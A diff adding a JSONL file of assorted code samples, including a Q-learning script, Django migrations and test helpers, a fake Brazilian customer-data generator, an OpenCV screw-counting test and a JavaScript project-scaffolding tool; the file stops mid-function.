diff --git "a/409.jsonl" "b/409.jsonl" new file mode 100644--- /dev/null +++ "b/409.jsonl" @@ -0,0 +1,734 @@ +{"seq_id":"451749011","text":"import gym\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\ndef main(envName):\n\n def get_discrete_state(state):\n discrete_state = (state - env.observation_space.low) / discrete_os_win_size\n return tuple(discrete_state.astype(np.int))\n\n env = gym.make(envName)\n env.reset()\n\n learning_rate = 0.1\n discount = 0.95\n episodes = 25_000\n\n show_every = 500\n plot_every = 100\n\n discrete_os_size = [30] * len(env.observation_space.high)\n discrete_os_win_size = (env.observation_space.high - env.observation_space.low) / discrete_os_size\n\n epsilon = 0.25\n start_epsilon_decaying = 1\n end_epsilon_decaying = episodes // 2\n\n epsilon_decay_value = epsilon / (end_epsilon_decaying - start_epsilon_decaying)\n\n q_table = np.random.uniform(low=-2, high=0, size=(discrete_os_size + [env.action_space.n]))\n\n ep_rewards = []\n aggr_ep_rewards = {'ep': [], 'avg': [], 'min': [], 'max': []}\n\n for episode in range(episodes + 1):\n\n episode_reward = 0\n\n if (not episode % show_every):\n render = True\n else:\n render = False\n\n discrete_state = get_discrete_state(env.reset())\n\n done = False\n while not done:\n\n if (np.random.random() > epsilon):\n action = np.argmax(q_table[discrete_state])\n else:\n action = np.random.randint(0, env.action_space.n)\n\n observation, reward, done, info = env.step(action)\n episode_reward += reward\n new_discrete_state = get_discrete_state(observation)\n\n if (render):\n env.render()\n\n if not done:\n max_future_q = np.max(q_table[new_discrete_state])\n current_q = q_table[discrete_state + (action, )]\n\n new_q = (1 - learning_rate) * current_q + learning_rate * (reward + discount * max_future_q)\n q_table[discrete_state + (action, )] = new_q\n elif observation[0] >= env.goal_position:\n q_table[discrete_state + (action, )] = 0\n\n discrete_state = new_discrete_state\n\n if (end_epsilon_decaying >= episode >= start_epsilon_decaying):\n epsilon -= epsilon_decay_value\n\n ep_rewards.append(episode_reward)\n\n if not episode % plot_every:\n average_reward = sum(ep_rewards[-plot_every:]) / len(ep_rewards[-plot_every:])\n aggr_ep_rewards['ep'].append(episode)\n aggr_ep_rewards['avg'].append(average_reward)\n aggr_ep_rewards['min'].append(min(ep_rewards[-plot_every:]))\n aggr_ep_rewards['max'].append(max(ep_rewards[-plot_every:]))\n\n print(f\"Episode: {episode}, average: {average_reward}, min: {min(ep_rewards[-plot_every:])}, max: {max(ep_rewards[-plot_every:])}\")\n env.close()\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['avg'], label=\"avg\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['min'], label=\"min\")\n plt.plot(aggr_ep_rewards['ep'], aggr_ep_rewards['max'], label=\"max\")\n plt.legend(loc=4)\n plt.grid()\n plt.show()\n","sub_path":"youtube_tutorial/basicQLearning.py","file_name":"basicQLearning.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"483312574","text":"def solution(prices):\n stack = [] #element : (price, index(day))\n n = len(prices)\n answer = [0] * n\n for curDay in range(n):\n curStockPrice = prices[curDay]\n\n while stack:\n preStockPrice, preDay = stack.pop()\n #현재 값이 더 크다면 넘겨!\n if curStockPrice >= preStockPrice:\n stack.append((preStockPrice,preDay))\n break\n answer[preDay] = curDay-preDay\n\n stack.append((curStockPrice,curDay))\n\n #마지막날 정산\n while stack:\n preStockPrice, preDay = stack.pop()\n answer[preDay] = curDay-preDay\n\n return answer\n\n\nprices = [1, 2, 3, 2, 3]\nprint(solution(prices))","sub_path":"Algorithm/[프로그래머스]주식가격.py","file_name":"[프로그래머스]주식가격.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"612471953","text":"'''Using the method of looping, write a program to print the table of 9 till N in the format as follows:\n(N is input by the user)\n9 18 27...\nSample Input :\n3\nSample Output :\n9 18 27\n'''\nn= int(input())\nif n!=0:\n for i in range(1,n+1):\n if i!=n:\n print((i*9),end=\" \")\n else:\n print(i*9)\nelse:\n print(\"NULL\")\n","sub_path":"Python/Absolute Beginner/781.py","file_name":"781.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"160189475","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('quizter', '0031_auto_20160521_1634'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='answer',\n name='test',\n field=models.ForeignKey(verbose_name='Тест', default=1, to='quizter.Test'),\n ),\n migrations.AlterField(\n model_name='useranswer',\n name='username',\n field=models.ForeignKey(verbose_name='Логин', default=1, to=settings.AUTH_USER_MODEL),\n ),\n ]\n","sub_path":"quizter/migrations/0032_auto_20160522_1210.py","file_name":"0032_auto_20160522_1210.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"502414658","text":"#%%\n## GERANDO DATASET DE DADOS DOS CLIENTES:\n## - NOME + SEXO\n## - SOBRENOME\n## - DATA_NASCIMENTO\n## - CPF\n## - ENDEREÇO\n\n\n#%%\nimport pandas as pd \nimport numpy as np\nimport re \nimport requests\nfrom bs4 import BeautifulSoup\n\nnp.random.seed(42)\n# %%\n#### PARTE 1: NOMES E SEXO DOS CLIENTES: #####\n### UTILIZANDO O DATASET https://brasil.io/dataset/genero-nomes/files/ \n### DO brasil.io, DO ALVARO JUSTIN\n### OBRIGADO, ALVARO!\n\ndataset = pd.read_csv('csv/nomes.csv.gz')\ndataset = dataset[['group_name','classification']]\ndataset.rename(columns={'group_name':'nome','classification':'sexo'}, inplace = True)\ndataset\n# %%\n#### PARTE 2: SOBRENOMES\n### UTILIZANDO SOBRENOMES DE tiltedlogic.org\nheaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nreq = requests.get('http://www.tiltedlogic.org/Familia/surnames-all.php?tree=', headers = headers)\nsoup = BeautifulSoup(req.text)\nlista_sobrenomes_simples = [x.text.encode('latin').decode('utf8').strip().upper() for x in soup.find_all('a', {'href':re.compile('mylastname')})][4:]\n\nfuncao_ordem_sobrenome_aleatoria = lambda: np.random.choice(lista_sobrenomes_simples, len(lista_sobrenomes_simples), replace = False)\n\ndef sobrenome_composto():\n result = set()\n for x in funcao_ordem_sobrenome_aleatoria():\n for y in funcao_ordem_sobrenome_aleatoria():\n if x != y:\n result.add(x + ' ' + y)\n if len(result) == len(dataset):\n return list(result)\n\ndataset.insert(1,'sobrenome', sobrenome_composto())\ndataset\n\n#%%\n### CPFS: CRIAR CPFS VÁLIDOS\n\nlista_cpfs = [str(x) for x in np.random.randint(300000000,399999999,len(dataset))]\n\nfor x in range(len(lista_cpfs)):\n lala = sum([(int(y)*z) for y,z in zip(lista_cpfs[x], range(10,1,-1))])*10%11\n lala = lala if int(lala) < 10 else '0'\n lista_cpfs[x] = lista_cpfs[x] + str(lala)\n lele = str(sum([(int(y)*z) for y,z in zip(lista_cpfs[x], range(11,1,-1))])*10%11)\n lele = lele if int(lele) < 10 else '0'\n lista_cpfs[x] = lista_cpfs[x] + lele\n\nlista_cpfs\n\n# %%\ndataset.insert(3, 'cpf', lista_cpfs)\n#%%\ndataset.insert(0, 'id_cliente', (dataset['nome'] + dataset['sobrenome'] + dataset['cpf']).apply(hash))\n\n#%%\ndataset\n\n\n# %%\ndataset.to_csv('csv/dados_clientes.csv', index = False)\n# %%\n","sub_path":"fake_datasets/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"157819647","text":"import matplotlib.pyplot as plt \nimport matplotlib.image as mpimg \nimport matplotlib.colors as clr\nimport numpy as np \nimport cv2 as cv\nimport os\nimport time\nimport screw_counting_library as sc\n\ndef main():\n folder = \"../../../dataset/images\"\n value_file = folder + \"/bases.txt\"\n \n imgs, files = sc.read_imgs(folder)\n values = sc.read_values(value_file)\n \n threshes = sc.morph_saturation(imgs)\n \n finals = []\n totals = []\n scores = []\n \n for (img, thresh, file, value) in zip(imgs, threshes, files, values):\n \n total, final = sc.blob_detection(img, thresh)\n score = sc.f1_measure(value, total)\n \n finals.append(final)\n totals.append(total)\n scores.append(score)\n \n save = zip(files, imgs, threshes, finals, values, totals, scores)\n rate = np.sum(scores) / len (scores)\n \n for (file, img, thresh, final, value, total, score) in save:\n print(\"Filename: %s, Detected objects: %d, Actual value: %d, Score: %5.3f\" % (file, total, value, score))\n \n print(\"\\n ######## \\n ######## \\n Average success in this batch: %5.3f \\n\" % (rate))\n\nif __name__ == '__main__':\n start = time.process_time()\n main()\n print(time.process_time() - start)\n\n\n\n","sub_path":"Code/Python_files/algorithm_test_2_blobDetection.py","file_name":"algorithm_test_2_blobDetection.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389289574","text":"import errno\nimport logging\nimport os\nimport shutil\nfrom contextlib import contextmanager\n\nfrom django.utils.six import StringIO\nfrom datetime import timedelta\n\nfrom django.core import serializers\nfrom django.db import IntegrityError\nfrom django.db import connections\nfrom django.apps import apps\nfrom django.core.management import call_command\n\nfrom django.conf import settings\nfrom django.contrib.auth import SESSION_KEY, HASH_SESSION_KEY, BACKEND_SESSION_KEY\nfrom django.contrib.auth.models import User\nfrom django.contrib.sessions.backends.db import SessionStore\nfrom django.contrib.sessions.models import Session\nfrom django.test import TestCase, TransactionTestCase, Client\nfrom django.utils.timezone import now\nfrom mock import patch\n\nfrom rest_framework.test import APIRequestFactory, force_authenticate\nfrom django_mock_queries.mocks import mocked_relations\n\nfrom constants import users\nfrom metadata.models import kive_user, KiveUser\n\n\nclass DuckRequest(object):\n \"\"\" A fake request used to test serializers. \"\"\"\n def __init__(self, user=None):\n self.user = user or kive_user()\n self.GET = {}\n self.META = {}\n self.method = 'GET'\n\n def build_absolute_uri(self, url):\n return url\n\n\nclass DuckContext(dict):\n \"\"\" A fake context used to test serializers. \"\"\"\n def __init__(self, user=None, **kwargs):\n super(DuckContext, self).__init__(**kwargs)\n self['request'] = DuckRequest(user=user)\n\n\nclass ViewMockTestCase(TestCase, object):\n def create_client(self):\n patcher = mocked_relations(User, Session)\n patcher.start()\n self.addCleanup(patcher.stop)\n\n user = User(pk=users.KIVE_USER_PK)\n User.objects.add(user)\n User.objects.model = User\n # noinspection PyUnresolvedReferences\n patcher = patch.object(User._meta, 'default_manager', User.objects)\n patcher.start()\n self.addCleanup(patcher.stop)\n dummy_session_key = 'dummysession'\n dummy_session = Session(\n session_key=dummy_session_key,\n expire_date=now() + timedelta(days=1),\n session_data=SessionStore().encode({\n SESSION_KEY: users.KIVE_USER_PK,\n HASH_SESSION_KEY: user.get_session_auth_hash(),\n BACKEND_SESSION_KEY: 'django.contrib.auth.backends.ModelBackend'}))\n Session.objects.add(dummy_session)\n client = Client()\n client.cookies[settings.SESSION_COOKIE_NAME] = dummy_session_key\n client.force_login(kive_user())\n return client\n\n\nclass BaseTestCases(object):\n \"\"\" A class to hide our base classes so they won't be executed as tests.\n \"\"\"\n def __init__(self):\n pass\n\n class ApiTestCase(TestCase, object):\n \"\"\"\n Base test case used for all API testing.\n\n Such test cases should provide tests of:\n - list\n - detail\n - creation (if applicable)\n - redaction\n - removal\n - any other detail or list routes\n\n In addition, inheriting classes must provide appropriate values for\n self.list_path and self.list_view in their setUp().\n \"\"\"\n def setUp(self):\n self.factory = APIRequestFactory()\n self.kive_user = kive_user()\n\n def mock_viewset(self, viewset_class):\n model = viewset_class.queryset.model\n patcher = mocked_relations(model, User, KiveUser)\n patcher.start()\n self.addCleanup(patcher.stop)\n\n user = User(pk=users.KIVE_USER_PK)\n User.objects.add(user)\n\n self.kive_kive_user = KiveUser(pk=users.KIVE_USER_PK, username=\"kive\")\n KiveUser.objects.add(self.kive_kive_user)\n\n # noinspection PyUnresolvedReferences\n patcher2 = patch.object(viewset_class,\n 'queryset',\n model.objects)\n patcher2.start()\n self.addCleanup(patcher2.stop)\n\n def test_auth(self):\n \"\"\"\n Test that the API URL is correctly defined and requires a logged-in user.\n \"\"\"\n # First try to access while not logged in.\n # noinspection PyUnresolvedReferences\n request = self.factory.get(self.list_path)\n # noinspection PyUnresolvedReferences\n response = self.list_view(request)\n self.assertEquals(response.data[\"detail\"], \"Authentication credentials were not provided.\")\n\n # Now log in and check that \"detail\" is not passed in the response.\n force_authenticate(request, user=self.kive_user)\n # noinspection PyUnresolvedReferences\n response = self.list_view(request)\n self.assertNotIn('detail', response.data)\n\n class SlurmExecutionTestCase(TransactionTestCase):\n \"\"\"\n Base test case used in lieu of TransactionTestCase for tests involving Slurm execution.\n\n This is a monkey-patched version of TransactionTestCase.\n \"\"\"\n serialized_rollback = True\n\n @staticmethod\n def deserialize_db_from_string(db_creation, data):\n \"\"\"\n Reloads the database with data from a string generated by\n the serialize_db_to_string method.\n \"\"\"\n from django.utils.six import StringIO\n\n data = StringIO(data)\n objects_to_add = list(serializers.deserialize(\"json\", data, using=db_creation.connection.alias))\n while len(objects_to_add) > 0:\n cannot_add_yet = []\n for obj in objects_to_add:\n try:\n obj.save()\n except IntegrityError:\n cannot_add_yet.append(obj)\n\n objects_to_add = cannot_add_yet\n\n def _fixture_setup(self):\n for db_name in self._databases_names(include_mirrors=False):\n # Reset sequences\n if self.reset_sequences:\n self._reset_sequences(db_name)\n\n # If we need to provide replica initial data from migrated apps,\n # then do so.\n if self.serialized_rollback and hasattr(connections[db_name], \"_test_serialized_contents\"):\n if self.available_apps is not None:\n apps.unset_available_apps()\n\n # Use our monkey-patched version of deserialize_db_from_string.\n BaseTestCases.SlurmExecutionTestCase.deserialize_db_from_string(\n connections[db_name].creation,\n connections[db_name]._test_serialized_contents\n )\n\n if self.available_apps is not None:\n apps.set_available_apps(self.available_apps)\n\n if self.fixtures:\n # We have to use this slightly awkward syntax due to the fact\n # that we're using *args and **kwargs together.\n call_command('loaddata', *self.fixtures,\n **{'verbosity': 0, 'database': db_name})\n\n def check_run_OK(self, run):\n for step in run.runsteps.all():\n for rsic in step.RSICs.all():\n self.assertTrue(rsic.is_successful())\n\n if step.has_subrun():\n self.check_run_OK(step.child_run)\n\n self.assertTrue(step.is_successful())\n\n for outcable in run.runoutputcables.all():\n self.assertTrue(outcable.is_successful())\n\n self.assertTrue(run.is_successful())\n\n\n# noinspection PyUnusedLocal\ndef dummy_file(content, name='dummy_file', mode='rb'):\n \"\"\" Create an in-memory, file-like object.\n\n :param str content: the contents of the file\n :param str name: a name for the file\n :param str mode: the mode to open the file (ignored)\n :return: an object that looks like an open file handle.\n \"\"\"\n\n data_file = StringIO(content)\n data_file.name = name\n data_file.__enter__ = lambda: None\n data_file.__exit__ = lambda extype, value, traceback: None\n return data_file\n\n\ndef check_media_root_is_test():\n if os.path.basename(settings.MEDIA_ROOT) != 'Testing':\n raise RuntimeError(\n \"MEDIA_ROOT doesn't end with 'Testing', use test settings.\")\n\n\ndef install_fixture_files(fixture_name):\n \"\"\"\n Helper that installs the FieldFiles for a given fixture.\n \"\"\"\n remove_fixture_files() # Remove any leftovers\n fixture_files_path = os.path.join(\"FixtureFiles\", fixture_name)\n assert os.path.isdir(fixture_files_path)\n\n for target in os.listdir(fixture_files_path):\n target_path = os.path.join(settings.MEDIA_ROOT, target)\n dir_to_install = os.path.join(fixture_files_path, target)\n shutil.copytree(dir_to_install, target_path)\n\n containers_path = os.path.join(settings.MEDIA_ROOT, 'Containers')\n if not os.path.exists(containers_path):\n os.makedirs(containers_path)\n test_container_path = os.path.join(containers_path,\n settings.DEFAULT_CONTAINER)\n if not os.path.exists(test_container_path):\n alpine_container_path = os.path.abspath(os.path.join(\n __file__,\n '..',\n '..',\n '..',\n 'samplecode',\n 'singularity',\n 'python2-alpine-trimmed.simg'))\n os.symlink(alpine_container_path, test_container_path)\n\n\ndef remove_fixture_files():\n \"\"\"\n Helper that removes all FieldFiles used by a test fixture.\n \"\"\"\n check_media_root_is_test()\n try:\n os.makedirs(settings.MEDIA_ROOT)\n # If that succeeded, then the folder is empty.\n return\n except OSError as ex:\n if ex.errno != errno.EEXIST:\n raise\n\n for dirname in os.listdir(settings.MEDIA_ROOT):\n target_path = os.path.join(settings.MEDIA_ROOT, dirname)\n shutil.rmtree(target_path)\n\n\ndef strip_removal_plan(plan):\n plan_not_blanks = {key: value\n for key, value in plan.items()\n if value}\n return plan_not_blanks\n\n\n@contextmanager\ndef capture_log_stream(log_level, *logger_names):\n mocked_stderr = StringIO()\n stream_handler = logging.StreamHandler(mocked_stderr)\n old_levels = {}\n loggers = {}\n for logger_name in logger_names:\n logger = logging.getLogger(logger_name)\n logger.addHandler(stream_handler)\n old_levels[logger_name] = logger.level\n logger.level = log_level\n try:\n yield mocked_stderr\n finally:\n for logger_name, logger in loggers.items():\n logger.removeHandler(stream_handler)\n logger.level = old_levels[logger_name]\n","sub_path":"kive/kive/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":10797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"518206707","text":"\n\nfrom xai.brain.wordbase.nouns._subsidy import _SUBSIDY\n\n#calss header\nclass _SUBSIDIES(_SUBSIDY, ):\n\tdef __init__(self,): \n\t\t_SUBSIDY.__init__(self)\n\t\tself.name = \"SUBSIDIES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"subsidy\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_subsidies.py","file_name":"_subsidies.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"391982828","text":"import json\nimport os\nimport subprocess\nimport threading\nfrom distutils.dir_util import copy_tree\n\nfrom _browser import open_url\nfrom _code import append_code, patch_code, prepend_code, prepend_line\nfrom _editor import open_in_editor\nfrom _shutil import call_echo, cd, copy, mkdir, save_json, update_json\nfrom _template import render_template_file\nfrom _term import Menu\n\nOVERWRITE = bool(\"{{_OVERWRITE}}\")\n\nREACT_INDEX_JS = \"src/hello-react.jsx\"\nSERVER_INDEX_JS = \"src/server/index.js\"\nMODEL_DIR = \"src/server/models\"\nINDEX_JS = \"src/index.js\"\nTEMPLATE_DIR = os.getcwd() + \"/js_tools\"\nTHREEJS_INDEX_JS = \"src/hello-three.js\"\n\n\nmenu = Menu()\n\n\ndef write_file(file, content, overwrite=False):\n dir = os.path.dirname(file)\n if dir:\n os.makedirs(dir, exist_ok=True)\n if not os.path.exists(file) or overwrite:\n with open(file, \"w\") as f:\n f.write(content)\n\n\ndef add_packages(packages, dev=False, use_yarn=False):\n yarn_init()\n\n with open(\"package.json\", \"r\") as f:\n data = json.load(f)\n\n existing_packages = []\n\n try:\n existing_packages += data[\"dependencies\"].keys()\n except KeyError:\n pass\n\n try:\n existing_packages += data[\"devDependencies\"].keys()\n except KeyError:\n pass\n\n for pkg in packages:\n if pkg not in existing_packages:\n if dev:\n if use_yarn:\n call_echo([\"yarn\", \"add\", \"--dev\", pkg], shell=True)\n else:\n call_echo([\"npm\", \"install\", \"--save-dev\", pkg], shell=True)\n else:\n if use_yarn:\n call_echo([\"yarn\", \"add\", pkg], shell=True)\n else:\n call_echo([\"npm\", \"install\", pkg], shell=True)\n\n\n@menu.item()\ndef add_css_loader():\n add_packages([\"style-loader\", \"css-loader\"], dev=True)\n\n # Add babel-loader to webpack config\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n \"\"\"{\n test: /\\.css$/i,\n use: [\"style-loader\", \"css-loader\"],\n },\"\"\",\n )\n\n\n@menu.item()\ndef add_webpack(index_js=\"src/index.js\", build_dir=\"docs\"):\n WEBPACK_CONFIG = \"webpack.config.js\"\n\n add_packages(\n [\"webpack\", \"webpack-cli\", \"webpack-dev-server\", \"html-webpack-plugin\"],\n dev=True,\n )\n\n # CSS loader\n add_packages([\"style-loader\", \"css-loader\", \"file-loader\"], dev=True)\n\n if not os.path.exists(WEBPACK_CONFIG) or OVERWRITE:\n render_template_file(\n TEMPLATE_DIR + \"/webpack.config.js\",\n WEBPACK_CONFIG,\n context={\"index_js\": index_js, \"build_dir\": build_dir},\n )\n\n if not os.path.exists(index_js):\n os.makedirs(os.path.dirname(index_js), exist_ok=True)\n # pathlib.Path(index_js).touch()\n\n add_script_to_package(\n \"start\",\n \"webpack serve --mode development --devtool inline-source-map --hot\",\n )\n add_script_to_package(\"build\", \"webpack\")\n\n # webpack_start()\n\n\ndef webpack_start():\n os.environ[\"PATH\"] += os.pathsep + os.path.join(project_dir, \"node_modules\", \".bin\")\n threading.Thread(\n target=lambda: call_echo(\"webpack serve --mode development\")\n ).start()\n\n\ndef add_script_to_package(name, script):\n # Package.json\n with open(\"package.json\", \"r\") as f:\n data = json.load(f)\n\n if \"scripts\" not in data.keys():\n data[\"scripts\"] = {}\n\n data[\"scripts\"][name] = script\n\n with open(\"package.json\", \"w\") as f:\n json.dump(data, f, indent=2)\n\n\n@menu.item()\ndef add_react(index_js=REACT_INDEX_JS):\n add_webpack(index_js=index_js)\n\n # # https://create-react-app.dev/docs/getting-started/\n # call_echo(\"yarn create react-app client\")\n\n add_packages([\"react\", \"react-dom\"])\n\n # CSS loader\n add_packages([\"style-loader\", \"css-loader\"])\n\n # Babel: transcompile jsx\n add_packages(\n [\n \"babel-loader\",\n \"@babel/core\",\n \"@babel/preset-env\",\n \"@babel/preset-react\",\n \"babel-plugin-react-html-attrs\", # transform class → className\n ],\n dev=True,\n )\n\n with open(\".babelrc\", \"w\") as f:\n f.write(\n \"\"\"{\n \"presets\": [\"@babel/preset-env\", \"@babel/preset-react\"],\n \"plugins\": [\"react-html-attrs\"]\n}\n\"\"\"\n )\n\n # Add babel-loader to webpack config\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n \"\"\"{\n test: /\\.jsx?$/,\n exclude: /node_modules/,\n use: {\n loader: \"babel-loader\",\n },\n },\"\"\",\n )\n\n mkdir(os.path.dirname(index_js))\n if not os.path.exists(index_js) or OVERWRITE:\n render_template_file(TEMPLATE_DIR + \"/hello-react.jsx\", index_js)\n\n add_script_to_package(\n \"client\",\n \"webpack serve --mode development --devtool inline-source-map --hot\",\n )\n\n\n@menu.item()\ndef add_react_starter():\n # https://github.com/react-boilerplate/react-boilerplate-cra-template\n call_echo(\n [\"npx\", \"create-react-app\", \"--template\", \"cra-template-rb\", \"my-app\"],\n shell=True,\n )\n\n\n@menu.item()\ndef add_MERN_stack():\n add_react()\n add_express()\n add_mongodb()\n\n add_script_to_package(\"dev\", 'concurrently \"npm run server\" \"npm run client\"')\n\n # add \"dev\" to run server and client concurrently\n add_packages([\"concurrently\"], dev=True)\n call_echo(\"npm run dev\")\n\n\n@menu.item()\ndef add_dat_gui():\n add_packages([\"dat.gui\"])\n\n\n@menu.item()\ndef add_p5(index_js=\"src/index.js\"):\n add_packages([\"p5\"])\n add_packages([\"@types/matter-js\"], dev=True)\n\n s = \"\"\"import p5 from \"p5\";\n\nconst sketch = (p) => {\n let x = 100;\n let y = 100;\n\n p.setup = function () {\n p.createCanvas(700, 410);\n };\n\n p.draw = function () {\n p.background(0);\n p.fill(255);\n p.rect(x, y, 50, 50);\n };\n};\n\nnew p5(sketch);\n\"\"\"\n\n if not os.path.exists(index_js) or OVERWRITE:\n mkdir(os.path.dirname(index_js))\n with open(index_js, \"w\") as f:\n f.write(index_js)\n\n\n@menu.item()\ndef add_react_bootstrap():\n add_packages([\"bootstrap\", \"react-bootstrap\", \"react-bootstrap-icons\"])\n\n # https://react-bootstrap.netlify.app/getting-started/introduction/\n prepend_line(REACT_INDEX_JS, \"import 'bootstrap/dist/css/bootstrap.min.css';\")\n\n\n@menu.item()\ndef add_express():\n add_packages([\"express\"])\n add_packages([\"nodemon\"], dev=True) # Monitor js changes and and hot reload\n\n # Package.json\n add_script_to_package(\"server\", \"nodemon src/server/index.js\")\n\n # Server index.js\n if not os.path.exists(SERVER_INDEX_JS) or OVERWRITE:\n mkdir(os.path.dirname(SERVER_INDEX_JS))\n with open(SERVER_INDEX_JS, \"w\") as f:\n f.write(\n \"\"\"const express = require('express');\nconst os = require('os');\n\nconst app = express();\n\napp.use(express.static('dist'));\n\napp.get(\"/api/getUsername\", (req, res) =>\n res.send({ username: os.userInfo().username })\n);\n\napp.listen(process.env.PORT || 8080, () => console.log(`Listening on port ${process.env.PORT || 8080}!`));\n\"\"\"\n )\n\n\n@menu.item()\ndef add_mongodb():\n add_packages([\"mongoose\"])\n\n mkdir(MODEL_DIR)\n with open(MODEL_DIR + \"/contact.js\", \"w\") as f:\n f.write(\n \"\"\"const mongoose = require(\"mongoose\");\n\nmodule.exports.Contact = mongoose.model(\n \"contact\",\n mongoose.Schema({\n name: {\n type: String,\n required: true,\n },\n phone: String,\n createDate: {\n type: Date,\n default: Date.now,\n },\n })\n);\n\"\"\"\n )\n\n patch_code(\n SERVER_INDEX_JS,\n \"^\",\n \"\"\"const mongoose = require(\"mongoose\");\nmongoose\n .connect(\"mongodb://localhost/test_db\", { useNewUrlParser: true })\n .then(() => {\n console.log(\"Database connected.\");\n })\n .catch((err) => console.log(err));\n\"\"\",\n count=1,\n )\n\n\n@menu.item()\ndef add_threejs():\n add_packages([\"three\", \"@types/three\"])\n\n os.makedirs(os.path.dirname(THREEJS_INDEX_JS), exist_ok=True)\n if not os.path.exists(THREEJS_INDEX_JS):\n render_template_file(TEMPLATE_DIR + \"/hello-three.js\", THREEJS_INDEX_JS)\n\n add_links()\n copy(TEMPLATE_DIR + \"/main.css\", \"src/main.css\", overwrite=False)\n write_file(\n \"src/index.js\",\n \"\"\"import \"./hello-three\";\nimport \"./links/links\";\nimport \"./main.css\";\"\"\",\n )\n\n\n@menu.item()\ndef add_tweakpane():\n # https://cocopon.github.io/tweakpane/getting-started/\n add_packages(\n [\n \"tweakpane\",\n \"@tweakpane/core\", # optional typescript support\n ]\n )\n\n\n@menu.item()\ndef add_typescript():\n add_packages([\"typescript\", \"ts-loader\"], dev=True)\n\n if not os.path.exists(\"tsconfig.json\"):\n save_json(\n \"tsconfig.json\",\n {\n \"compilerOptions\": {\n \"outDir\": \"./dist/\",\n \"noImplicitAny\": True,\n \"removeComments\": True,\n \"module\": \"es6\",\n \"target\": \"es5\",\n \"jsx\": \"react\",\n \"allowJs\": True,\n \"moduleResolution\": \"node\",\n }\n },\n )\n\n append_code(\n \"webpack.config.js\",\n \"rules: [\",\n \"\"\"{\n test: /\\.tsx?$/,\n use: 'ts-loader',\n exclude: /node_modules/,\n },\"\"\",\n )\n\n prepend_code(\n \"webpack.config.js\",\n \"output: {\",\n \"\"\"resolve: {\n extensions: ['.tsx', '.ts', '.js'],\n },\"\"\",\n )\n\n\n@menu.item()\ndef add_matterjs(index_js=\"src/index.js\"):\n add_packages([\"matter-js\"])\n add_packages([\"@types/matter-js\"])\n\n write_file(\n index_js,\n \"\"\"import * as Matter from \"matter-js\";\n\nvar Engine = Matter.Engine,\n Render = Matter.Render,\n Runner = Matter.Runner,\n Bodies = Matter.Bodies,\n Composite = Matter.Composite;\n\nvar engine = Engine.create();\n\nvar render = Render.create({\n element: document.body,\n engine: engine\n});\n\nvar boxA = Bodies.rectangle(400, 200, 80, 80);\nvar boxB = Bodies.rectangle(450, 50, 80, 80);\nvar ground = Bodies.rectangle(400, 610, 810, 60, { isStatic: true });\n\nComposite.add(engine.world, [boxA, boxB, ground]);\n\nRender.run(render);\n\n// create runner\nvar runner = Runner.create();\n\n// run the engine\nRunner.run(runner, engine);\n\"\"\",\n )\n\n\n@menu.item()\ndef open_vscode():\n open_in_editor(os.getcwd())\n\n\n@menu.item()\ndef add_fontawesome():\n add_packages(\n [\n \"@fortawesome/fontawesome-svg-core\",\n \"@fortawesome/free-brands-svg-icons\",\n ]\n )\n print(\n \"See also: https://fontawesome.com/v5.15/how-to-use/javascript-api/setup/library\"\n )\n\n\n@menu.item()\ndef add_face_landmark_detection():\n add_packages(\n [\n \"@tensorflow-models/face-landmarks-detection\",\n \"@tensorflow/tfjs-backend-webgl\",\n \"@tensorflow/tfjs-converter\",\n \"@tensorflow/tfjs-core\",\n ]\n )\n\n\n@menu.item()\ndef add_links():\n copy_tree(TEMPLATE_DIR + \"/links\", \"src/links\")\n\n\n@menu.item()\ndef nextjs_create_app():\n call_echo([\"yarn\", \"create\", \"next-app\", os.getcwd()], shell=True)\n\n\n@menu.item()\ndef nextjs_start_dev_server():\n open_url(\"http://localhost:3000/\")\n call_echo([\"yarn\", \"dev\"], shell=True)\n\n\n@menu.item()\ndef yarn_init():\n subprocess.check_call([\"run_script\", \"r/web/init_yarn_package.sh\"])\n\n\n@menu.item()\ndef add_puppeteer():\n add_packages([\"puppeteer\"])\n\n\n@menu.item()\ndef add_eslint():\n \"\"\"\n https://eslint.org/docs/latest/user-guide/getting-started\n \"\"\"\n update_json(\n \".vscode/settings.json\",\n {\n \"editor.formatOnSave\": True,\n \"editor.defaultFormatter\": \"esbenp.prettier-vscode\",\n \"editor.codeActionsOnSave\": {\"source.fixAll.eslint\": True},\n \"eslint.validate\": [\"javascript\"],\n },\n )\n add_packages(\n [\n \"@typescript-eslint/eslint-plugin\",\n \"@typescript-eslint/parser\",\n \"eslint\",\n \"eslint-config-airbnb\",\n \"eslint-config-airbnb-typescript\",\n \"eslint-config-standard-with-typescript\",\n 